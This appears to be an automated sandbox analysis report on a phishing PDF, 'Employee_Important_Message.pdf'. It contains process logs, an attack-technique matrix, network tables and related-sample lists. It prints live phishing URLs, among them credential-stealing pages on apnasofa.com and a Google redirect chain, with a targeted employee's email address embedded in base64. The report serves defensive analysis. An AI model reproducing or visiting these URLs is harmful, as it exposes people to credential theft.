Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1996,i,4822762108358950042,13094913143839525268,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1620 --field-trial-handle=1548,i,4707952982078980515,2940567251321136579,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1996,i,4822762108358950042,13094913143839525268,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
Source: Employee_Important_Message.pdfInitial sample: PDF keyword /JS count = 0
Source: Employee_Important_Message.pdfInitial sample: PDF keyword /JavaScript count = 0
Source: Employee_Important_Message.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
3
Masquerading
OS Credential Dumping1
System Information Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29t100%SlashNextCredential Stealing type: Phishing & Social Engineering
https://apnasofa.com/episode/style.css100%Avira URL Cloudmalware
https://apnasofa.com/episode/index100%Avira URL Cloudmalware
https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html0%Avira URL Cloudsafe
https://apnasofa.com/favicon.ico100%Avira URL Cloudmalware
https://apnasofa.com/episode/image/logo.png100%Avira URL Cloudmalware
https://apnasofa.com/episode/script.js100%Avira URL Cloudmalware
https://apnasofa.com/episode/index#100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
ipwhois.app
103.126.138.87
truefalse
    high
    www.google.lk
    172.217.19.227
    truefalse
      high
      google.lk
      142.250.181.67
      truefalse
        high
        www.google.com
        142.250.181.100
        truefalse
          high
          api.ipify.org
          104.26.12.205
          truefalse
            high
            default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
            84.201.208.106
            truefalse
              high
              apnasofa.com
              103.160.107.138
              truefalse
                high
                s3-r-w.us-east-1.amazonaws.com
                16.182.103.34
                truefalse
                  high
                  i--iy.s3.us-east-1.amazonaws.com
                  unknown
                  unknownfalse
                    unknown
                    x1.i.lencr.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://apnasofa.com/favicon.icofalse
                      • Avira URL Cloud: malware
                      unknown
                      https://apnasofa.com/episode/script.jsfalse
                      • Avira URL Cloud: malware
                      unknown
                      https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.htmlfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ipwhois.app/json/8.46.123.228false
                        high
                        https://apnasofa.com/episode/image/logo.pngfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://apnasofa.com/episode/style.cssfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://api.ipify.org/?format=jsonfalse
                          high
                          https://www.google.lk/amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.htmlfalse
                            high
                            https://google.lk/url?q=mogrady@hollandco.com&hollandco.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.htmlfalse
                              high
                              https://apnasofa.com/episode/indexfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29ttrue
                              • SlashNext: Credential Stealing type: Phishing & Social Engineering
                              unknown
                              https://www.google.lk/url?q=mogrady@hollandco.com&hollandco.com=&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.htmlfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.2.drfalse
                                  high
                                  https://apnasofa.com/episode/index#chromecache_145.6.drfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  172.217.19.227
                                  www.google.lkUnited States
                                  15169GOOGLEUSfalse
                                  104.26.12.205
                                  api.ipify.orgUnited States
                                  13335CLOUDFLARENETUSfalse
                                  103.160.107.138
                                  apnasofa.comunknown
                                  7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                  23.195.76.153
                                  unknownUnited States
                                  2914NTT-COMMUNICATIONS-2914USfalse
                                  142.250.181.100
                                  www.google.comUnited States
                                  15169GOOGLEUSfalse
                                  239.255.255.250
                                  unknownReserved
                                  unknownunknownfalse
                                  16.182.103.34
                                  s3-r-w.us-east-1.amazonaws.comUnited States
                                  unknownunknownfalse
                                  142.250.181.67
                                  google.lkUnited States
                                  15169GOOGLEUSfalse
                                  103.126.138.87
                                  ipwhois.appUnited States
                                  40676AS40676USfalse
                                  172.67.74.152
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  IP
                                  192.168.2.16
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1565259
                                  Start date and time:2024-11-29 14:29:14 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 2m 56s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:16
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:Employee_Important_Message.pdf
                                  Detection:MAL
                                  Classification:mal64.phis.winPDF@29/53@23/11
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .pdf
                                  • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 216.58.208.227, 74.125.205.84, 172.217.19.238, 2.18.84.145, 84.201.208.106, 34.104.35.123, 50.16.47.176, 18.213.11.84, 54.224.241.105, 34.237.241.83, 162.159.61.3, 172.64.41.3, 23.195.39.65, 104.86.110.50, 2.16.34.32, 2.20.68.210, 2.20.68.201, 142.250.181.74, 142.250.181.106, 142.250.181.138, 172.217.17.42, 172.217.17.74, 172.217.19.234, 172.217.21.42, 142.250.181.10, 172.217.19.202, 172.217.17.78
                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, a767.dspw65.akamai.net, acroipm2.adobe.com, clients2.google.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, edgedl.me.gvt1.com, clients.l.google.com, geo2.adobe.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • VT rate limit hit for: Employee_Important_Message.pdf
                                  TimeTypeDescription
                                  08:30:01API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                  SourceURL
                                  Screenshothttps://google.lk/url?q=mogrady@hollandco.com&hollandco.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#bW9ncmFkeUBob2xsYW5kY28uY29t
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  104.26.12.205Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                  • api.ipify.org/
                                  Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                  • api.ipify.org/
                                  6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                  • api.ipify.org/
                                  perfcc.elfGet hashmaliciousXmrigBrowse
                                  • api.ipify.org/
                                  SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                  • api.ipify.org/
                                  SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                  • api.ipify.org/
                                  hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                  • api.ipify.org/
                                  file.exeGet hashmaliciousRDPWrap ToolBrowse
                                  • api.ipify.org/
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • api.ipify.org/
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • api.ipify.org/
                                  103.160.107.138https://apnasofa.com/episode/index#a29heXllZWNoaW5nQGZhcmVhc3QuY29tGet hashmaliciousUnknownBrowse
                                    23.195.76.153Invoice-99007553423-protected.pdfGet hashmaliciousUnknownBrowse
                                      Kellyb Timesheet Report.pdfGet hashmaliciousHTMLPhisherBrowse
                                        Demande de proposition du Fondation qu#U00e9b#U00e9coise du cancer.pdfGet hashmaliciousUnknownBrowse
                                          Atlanta Office Interiors #024-010.pdfGet hashmaliciousUnknownBrowse
                                            Contract_Agreement_Monday October 2024.pdfGet hashmaliciousUnknownBrowse
                                              Open 99 Restaurants Benefits Enrollment.pdfGet hashmaliciousHTMLPhisherBrowse
                                                DOC-72212087.pdfGet hashmaliciousHTMLPhisherBrowse
                                                  [EXTERNAL] Complete with AdobeSignPDF_ Approve and Sign TRCOT.emlGet hashmaliciousUnknownBrowse
                                                    Secured Doc-[uiC-22723].pdfGet hashmaliciousHTMLPhisherBrowse
                                                      Secured Doc-[qnz-33059].pdfGet hashmaliciousHTMLPhisherBrowse
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comScan_6090402.pdfGet hashmaliciousUnknownBrowse
                                                        • 217.20.56.101
                                                        kingsmaker_6.ca.ps1Get hashmaliciousDucktailBrowse
                                                        • 84.201.208.102
                                                        Demande de proposition du Regional Development Network .pdfGet hashmaliciousUnknownBrowse
                                                        • 84.201.208.67
                                                        drawing 10023. spec T4 300W .... dimn 560horsepower po 1198624 _ %00% spec .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 217.20.56.101
                                                        eicar-adobe-acrobat-attachment.pdfGet hashmaliciousEICARBrowse
                                                        • 217.20.59.36
                                                        Account Review Desk - Help us keep your VAT account accurate.msgGet hashmaliciousCredentialStealerBrowse
                                                        • 84.201.211.38
                                                        invoice-1664809283.pdfGet hashmaliciousUnknownBrowse
                                                        • 84.201.211.20
                                                        faktura461250706050720242711#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 84.201.208.103
                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                        • 217.20.56.101
                                                        Siparis po 1198624 _#U0130zmir #U0130stinyepark Projesi.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 84.201.208.67
                                                        api.ipify.org9arEd0o4IZ.exeGet hashmaliciousUnknownBrowse
                                                        • 104.26.12.205
                                                        IwSa5fjMWm.exeGet hashmaliciousUnknownBrowse
                                                        • 172.67.74.152
                                                        051qAVqlq9.exeGet hashmaliciousUnknownBrowse
                                                        • 104.26.12.205
                                                        rkGw58sHF5.exeGet hashmaliciousUnknownBrowse
                                                        • 104.26.12.205
                                                        Vr39ff92jh.exeGet hashmaliciousUnknownBrowse
                                                        • 172.67.74.152
                                                        LBswoftSFF.exeGet hashmaliciousUnknownBrowse
                                                        • 104.26.12.205
                                                        3lpDhNtVKt.exeGet hashmaliciousUnknownBrowse
                                                        • 172.67.74.152
                                                        dAkpFjNw3j.exeGet hashmaliciousUnknownBrowse
                                                        • 104.26.13.205
                                                        https://apnasofa.com/episode/index#a29heXllZWNoaW5nQGZhcmVhc3QuY29tGet hashmaliciousUnknownBrowse
                                                        • 172.67.74.152
                                                        Scan_19112024_people_power_press.pdfGet hashmaliciousUnknownBrowse
                                                        • 104.26.12.205
                                                        ipwhois.apphttps://apnasofa.com/episode/index#a29heXllZWNoaW5nQGZhcmVhc3QuY29tGet hashmaliciousUnknownBrowse
                                                        • 103.126.138.87
                                                        d8EEfAi7tl.vbsGet hashmaliciousMoDiRATBrowse
                                                        • 195.201.57.90
                                                        ubes6SC7Vd.exeGet hashmaliciousUnknownBrowse
                                                        • 195.201.57.90
                                                        SecuriteInfo.com.FileRepMalware.9397.20651.exeGet hashmaliciousUnknownBrowse
                                                        • 15.204.213.5
                                                        CbLQcrwzUi.exeGet hashmaliciousUnknownBrowse
                                                        • 15.204.213.5
                                                        AYReport_EN.exeGet hashmaliciousBlackGuardBrowse
                                                        • 15.204.213.5
                                                        Fortnite_CHEAT_CRACKED.exeGet hashmaliciousUnknownBrowse
                                                        • 108.181.47.111
                                                        3r3usOVGsa.exeGet hashmaliciousBlackGuardBrowse
                                                        • 195.201.57.90
                                                        KvVXVfYvlF.exeGet hashmaliciousBlackGuard, SmokeLoaderBrowse
                                                        • 195.201.57.90
                                                        file.exeGet hashmaliciousBlackGuardBrowse
                                                        • 195.201.57.90
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        CLOUDFLARENETUShttps://e.letscompress.online/update.txtGet hashmaliciousUnknownBrowse
                                                        • 104.21.13.59
                                                        Bakkavor-Distribution.docxGet hashmaliciousUnknownBrowse
                                                        • 104.17.25.14
                                                        Bakkavor-Distribution.docxGet hashmaliciousUnknownBrowse
                                                        • 104.17.25.14
                                                        https://ciicai-com.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                        • 104.17.25.14
                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 104.21.43.156
                                                        https://stoorm5.activehosted.com/content/PNNm1e/2024/11/29/296d9a00-ab7c-413b-8445-d50603229893.pdfGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.17.25.14
                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 104.21.16.9
                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 104.21.16.9
                                                        K6aOw2Jmji.exeGet hashmaliciousStealeriumBrowse
                                                        • 104.16.185.241
                                                        uyz4YPUyc9.exeGet hashmaliciousStealeriumBrowse
                                                        • 104.16.184.241
                                                        NTT-COMMUNICATIONS-2914USbotx.mips.elfGet hashmaliciousMiraiBrowse
                                                        • 206.52.68.156
                                                        loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                        • 207.198.205.78
                                                        loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 205.146.8.255
                                                        loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                        • 199.4.90.200
                                                        loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                        • 192.205.121.91
                                                        loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 198.64.179.244
                                                        sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 206.50.62.34
                                                        sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                        • 207.156.237.211
                                                        sora.ppc.elfGet hashmaliciousMiraiBrowse
                                                        • 207.71.80.113
                                                        loligang.x86-20241128-1536.elfGet hashmaliciousMiraiBrowse
                                                        • 204.200.128.15
                                                        AS40676USPayment_Advice_HSBC_Swift_Copy.pdf.lnkGet hashmaliciousRedLineBrowse
                                                        • 41.216.183.218
                                                        https://apnasofa.com/episode/index#a29heXllZWNoaW5nQGZhcmVhc3QuY29tGet hashmaliciousUnknownBrowse
                                                        • 103.126.138.87
                                                        x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 107.169.197.241
                                                        mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 107.169.30.137
                                                        sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 209.14.9.226
                                                        Banco Santander Totta _Aconselhamento_Pagamento.imgGet hashmaliciousRemcosBrowse
                                                        • 41.216.183.238
                                                        loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 205.161.47.142
                                                        mipsel.elfGet hashmaliciousUnknownBrowse
                                                        • 196.54.55.155
                                                        m68k.elfGet hashmaliciousMiraiBrowse
                                                        • 107.177.50.147
                                                        pbnpvwfhco.elfGet hashmaliciousUnknownBrowse
                                                        • 172.106.72.184
                                                        AARNET-AS-APAustralianAcademicandResearchNetworkAARNebotx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 103.176.131.64
                                                        loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                        • 103.34.254.249
                                                        loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 103.64.161.203
                                                        https://apnasofa.com/episode/index#a29heXllZWNoaW5nQGZhcmVhc3QuY29tGet hashmaliciousUnknownBrowse
                                                        • 103.160.107.138
                                                        sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                        • 103.175.14.108
                                                        x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 103.179.184.209
                                                        arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 131.181.47.160
                                                        nabspc.elfGet hashmaliciousUnknownBrowse
                                                        • 103.161.164.75
                                                        Salmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 103.168.172.37
                                                        spc.elfGet hashmaliciousMiraiBrowse
                                                        • 103.33.61.53
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        28a2c9bd18a11de089ef85a160da29e4https://zfrmz.com/T43PlTPOxp2IyD9DoPOmGet hashmaliciousUnknownBrowse
                                                        • 172.202.163.200
                                                        • 2.18.84.141
                                                        Bakkavor-Distribution.docxGet hashmaliciousUnknownBrowse
                                                        • 172.202.163.200
                                                        • 2.18.84.141
                                                        https://ciicai-com.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                        • 172.202.163.200
                                                        • 2.18.84.141
                                                        Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                        • 172.202.163.200
                                                        • 2.18.84.141
                                                        file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                        • 172.202.163.200
                                                        • 2.18.84.141
                                                        https://stoorm5.activehosted.com/content/PNNm1e/2024/11/29/296d9a00-ab7c-413b-8445-d50603229893.pdfGet hashmaliciousHTMLPhisherBrowse
                                                        • 172.202.163.200
                                                        • 2.18.84.141
                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 172.202.163.200
                                                        • 2.18.84.141
                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 172.202.163.200
                                                        • 2.18.84.141
                                                        file.exeGet hashmaliciousVidarBrowse
                                                        • 172.202.163.200
                                                        • 2.18.84.141
                                                        https://aysesuretobea.com/Get hashmaliciousUnknownBrowse
                                                        • 172.202.163.200
                                                        • 2.18.84.141
                                                        No context
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):290
                                                        Entropy (8bit):5.270826991125807
                                                        Encrypted:false
                                                        SSDEEP:6:HM8u44Oq2PRN2nKuAl9OmbnIFUt8YM8u+0Zmw+YM8u+0kwORN2nKuAl9OmbjLJ:s8zvaHAahFUt838/0/+38/05JHAaSJ
                                                        MD5:4DB8B34EBD26D1D6D2C261943E3ED970
                                                        SHA1:B17C982E3AB71D415EEA7B1447CD5DC2D6B5FA35
                                                        SHA-256:377D212AC3613EB94B5E35009A553B3B96B20BD13F386719BCC1A3CEC6B01451
                                                        SHA-512:382D375278EA08E1537ABFF97E112FFF4932ACA327599631CC54177B9FD8E2067ACFE1BAD673F327F39FBD67F7A7D21F2090DBEBB8B3D435B566C804D7C380EF
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:2024/11/29-08:29:47.363 17c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/29-08:29:47.365 17c4 Recovering log #3.2024/11/29-08:29:47.365 17c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):290
                                                        Entropy (8bit):5.270826991125807
                                                        Encrypted:false
                                                        SSDEEP:6:HM8u44Oq2PRN2nKuAl9OmbnIFUt8YM8u+0Zmw+YM8u+0kwORN2nKuAl9OmbjLJ:s8zvaHAahFUt838/0/+38/05JHAaSJ
                                                        MD5:4DB8B34EBD26D1D6D2C261943E3ED970
